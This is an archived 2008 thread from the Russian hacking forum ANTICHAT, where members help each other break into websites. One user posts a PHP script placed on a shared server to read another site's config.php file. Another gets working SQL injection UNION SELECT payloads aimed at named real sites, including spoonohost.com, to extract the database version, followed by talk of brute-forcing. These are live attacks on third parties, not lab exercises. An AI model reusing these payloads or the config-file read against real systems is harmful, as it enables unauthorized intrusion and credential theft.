ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

27.12.2008, 22:42
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме: 192463
Репутация:
97
|
|
Pashkela
Я залил скрипт 1.php с таким содержанием
PHP код:
<?
$file = file_get_contents("/home/t/target/target.com/public/www/config.php");
if(!file) echo 'Ошибка открытия файла';
else echo $file;
?>
на серв /home/s/site/site.com/public/www/
Что поменять?? o_O
|
|
|

27.12.2008, 22:46
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
2 Imperou$:
PHP код:
in /home/s/site/site.com/public/www/1.php on line 2
Забей, юзай способ от ThreeD, только в конце укажи название файла, а не просто директорию
Последний раз редактировалось Pashkela; 27.12.2008 в 22:51..
|
|
|

27.12.2008, 22:51
|
|
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме: 120981
Репутация:
1
|
|
Народ есть sql inj. Определяю через group by что количество столбцов 5. Но когда пытаюсь использовать id=1'+union+select+1,2,3,4,5/* говорит Query failed: The used SELECT statements have a different number of columns хотя group by говорит что их именно 5. В чем может быть проблема?
На запрос id=1' получаю ответ Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' ORDER BY issue_date DESC LIMIT 1' at line 3
Такое впечатление что injection тут после ORDER BY. Но что то я не могу найти где подробней про нее почитать. Может кто подскажет ?
|
|
|

27.12.2008, 22:54
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сначала надо оценить и правильно понять первоначальную ошибку при выявлении sql-inj. Если в тексте ошибки есть что-то типо left join - значит в запросе участвует не одна таблица, а как минимум две, то данные не выведутся скорее всего, фактически получается blind sql inj
|
|
|

27.12.2008, 22:57
|
|
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме: 120981
Репутация:
1
|
|
Сообщение от Pashkela
Сначала надо оценить и правильно понять первоначальную ошибку при выявлении sql-inj. Если в тексте ошибки есть что-то типо left join - значит в запросе участвует не одна таблица, а как минимум две, то данные не выведутся скорее всего, фактически получается blind sql inj
Все ошибки что есть я запостил.
|
|
|

27.12.2008, 23:01
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
если можешь, ссылку кинь в личку
|
|
|

28.12.2008, 00:07
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Короче нашел, лень в аську выходить просто  )
http://сайт.ru/print.php?id=1'+union+select+1,2,3,4,5,6,7,8,9,10, version(),12/*
просто ты неправильно подобрал кол-во колонок. Лучше всегда подбирать через order+by, т.к. там всегда пишет конкретно, а не фигню всякую.
Поздравляю, там 4.1.20-log
Только брут
|
|
|

28.12.2008, 00:48
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме: 279406
Репутация:
37
|
|
Помогите, пжста, подобрать колонки
 ) все подобрал ))
Последний раз редактировалось Thrasher88; 28.12.2008 в 01:20..
|
|
|

28.12.2008, 00:54
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Смешной парень, личка тебе уже не поможет
http://www.spoonohost.com/about/news.php?id=-1+union+select+1,2,3,4,version()--
|
|
|

28.12.2008, 01:01
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме: 279406
Репутация:
37
|
|
Ну и что ты этим хотел сказать?? я знаю какая версия БД.. :/
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|